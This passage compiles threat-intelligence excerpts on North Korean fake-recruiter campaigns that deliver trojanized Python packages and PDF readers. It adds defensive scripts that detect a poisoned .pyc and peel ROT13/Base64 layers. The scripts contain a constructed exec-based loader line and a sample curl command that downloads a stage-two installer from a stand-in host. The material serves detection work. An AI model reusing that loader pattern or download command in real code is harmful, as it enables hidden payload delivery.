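    report = {"source": str(src), "pyc": str(pyc), "findings": [], "injected_names": set()}
    if not pyc.is_file():
        return report
    data = pyc.read_bytes()
    hdr = parse_pyc_header(data)
    if not hdr["magic_ok"]:
        report["findings"].append("magic mismatch: pyc built by a different interpreter version")
        return report  # foreign bytecode cannot be unmarshalled safely here
    src_bytes = src.read_bytes()
    if hdr["hash_based"]:
        if hdr["source_hash"] != importlib.util.source_hash(src_bytes):
            report["findings"].append("hash mismatch: pyc was not compiled from this source")
    else:
        st = src.stat()
        recorded, actual = (hdr["mtime"], hdr["size"]), (int(st.st_mtime) & 0xFFFFFFFF, st.st_size & 0xFFFFFFFF)
        if recorded != actual:
            report["findings"].append("stale pyc: recorded mtime/size differ from source")
    cached = marshal.loads(data[16:])
    fresh = compile(src_bytes, str(src), "exec")
    report["injected_names"] = all_names(cached) - all_names(fresh)
    if report["injected_names"]:
        report["findings"].append("names only in bytecode: " + ", ".join(sorted(report["injected_names"])))
    return report


# Constructed sources: a clean clipboard stub, and the same stub with an injected loader.
BENIGN_SRC = "def copy(text):\n    return text\n\ndef paste():\n    return ''\n"
INJECTED_SRC = BENIGN_SRC + (
    "import base64, codecs\n"
    "exec(codecs.decode(base64.b64decode(b'').decode(), 'rot_13'))\n")  # compiled only, never run


def demo() -> dict:
    """Build the fixture in a temp dir and return the clean and poisoned reports."""
    root = Path(tempfile.mkdtemp())
    try:
        pkg = root / "pyperclip_demo"
        pkg.mkdir()
        src = pkg / "__init__.py"
        mode = py_compile.PycInvalidationMode.TIMESTAMP
        src.write_text(BENIGN_SRC)
        py_compile.compile(str(src), doraise=True, invalidation_mode=mode)
        clean = check_pyc(src)
        src.write_text(INJECTED_SRC)
        py_compile.compile(str(src), doraise=True, invalidation_mode=mode)
        src.write_text(BENIGN_SRC)  # clean-looking source shipped beside the poisoned pyc
        poisoned = check_pyc(src)
        return {"clean": clean, "poisoned": poisoned}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for label, rep in demo().items():
        print(label, rep["findings"] or "ok")
```

The name diff is the check that survives a forged header: an attacker can set the recorded mtime and size to match the decoy source, but cannot make a clean source compile into bytecode that imports base64 and calls exec.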
Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a “homework task.” The developer was asked to “find the bug,” resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine.
On September 3, 2024 the Federal Bureau of Investigation (FBI) released a public service announcement warning those in the crypto industry that the Democratic People's Republic of Korea ("DPRK", aka North Korea) has been targeting individuals with carefully crafted social engineering techniques to deliver malware.
Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
“The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.”
Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
Mandiant: An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader
Mandiant Managed Defense has reported similar activity in 2022 attributed to UNC4034, which later got merged into UNC2970.
UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.
UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher.
Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.
UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application.
For example, under the "Required Education, Experience, & Skills" section, the original post mentions "United States Air Force or highly comparable experience," while the malicious PDF omits this line. Another omitted line is under the "Preferred Education, Experience, & Skills" section, where the original job description includes "Preferred location McLean, Virginia."
BAE_VICE President of Business Development.pdf - An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor
libmupdf.dll
PdfFilter.dll
SumatraPDF.exe
This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:
The backdoor reads configuration data from the file setup.bin if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message "Hi,I m just woke up!" to its command-and-control (C2 or C&C) server.
Code of Conduct: DPRK’s Python- fueled intrusions into secured networks
Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks.
The main PasswordManager.py file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (Pyperclip and Pyrebase) into this main script.
The script within the Pyperclip package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine.
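Both the DangerousPassword Python downloader described earlier (ROT13 over its C2 strings) and the trojanized pyperclip script here (ROT13 layered with Base64) hide their indicators behind reversible encodings, so triage reduces to peeling layers until a URL or command appears. The following is an added example, not code from either report: it applies the two decodings in whichever order the sample used, stops when the result looks like an indicator, and records the layer order so the string can be documented. The sample plaintexts are constructed (`example.invalid`) and are obfuscated in-script rather than copied from any sample.

```python
"""Peel layered ROT13/Base64 obfuscation from C2 strings (added example)."""
import base64
import binascii
import codecs
import re
from typing import List, Optional, Tuple

INDICATOR = re.compile(r"(https?://|\.(?:asp|php|exe|py)\b|powershell|cmd\.exe|/bin/sh|curl )", re.I)
PRINTABLE = re.compile(r"^[\x09\x0a\x0d\x20-\x7e]+$")

# Constructed plaintexts, shaped like the .asp C2 paths and MSI download listed above.
SAMPLE_PLAIN = [
    "https://example.invalid/download/download.asp",
    "cmd.exe /c curl -o C:\\Users\\Public\\stage2.msi https://example.invalid/stage2.msi",
]


def rot13(text: str) -> str:
    return codecs.decode(text, "rot_13")


def obfuscate(plain: str, layers: Tuple[str, ...] = ("rot13", "b64")) -> str:
    """Apply the given layers in order; used only to build test input here."""
    out = plain
    for layer in layers:
        out = rot13(out) if layer == "rot13" else base64.b64encode(out.encode()).decode()
    return out


def try_b64(text: str) -> Optional[str]:
    """Strict Base64 decode that only accepts a printable-text result."""
    try:
        raw = base64.b64decode(text, validate=True)
        decoded = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return decoded if PRINTABLE.match(decoded) else None


def deobfuscate(blob: str, max_depth: int = 8) -> Tuple[str, List[str]]:
    """Return (plaintext, layers peeled) or the furthest decode reached."""
    cur, layers = blob, []
    for _ in range(max_depth):
        if INDICATOR.search(cur):
            return cur, layers
        decoded = try_b64(cur)
        if decoded is not None:
            cur, layers = decoded, layers + ["b64"]
            continue
        rotated = rot13(cur)  # only accept a rotation that exposes an indicator or valid Base64
        if INDICATOR.search(rotated) or try_b64(rotated) is not None:
            cur, layers = rotated, layers + ["rot13"]
            continue
        break
    return cur, layers


def defang(url: str) -> str:
    """Defang the host part of a recovered URL for safe inclusion in notes."""
    return re.sub(r"^(https?://)([^/]+)", lambda m: m.group(1) + m.group(2).replace(".", "[.]"), url)


if __name__ == "__main__":
    for plain, order in zip(SAMPLE_PLAIN, (("rot13", "b64"), ("b64", "rot13"))):
        recovered, peeled = deobfuscate(obfuscate(plain, order))
        print(peeled, defang(recovered))
```

The stopping rule is what keeps this from looping: ROT13 is its own inverse, so a rotation is only accepted when it produces something recognisable, either an indicator or a string that strict Base64 decoding accepts.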
This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as “CovertCatch.”
The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as "KandyKorn" that targeted cryptocurrency developers and engineers.
Mandiant: UNC5267 - Staying a Step Ahead: Mitigating the DPRK IT Worker Threat
UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.
Financial gain through illicit salary withdrawals from compromised companies
Maintaining long-term access to victim networks for potential future financial exploitation
Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed)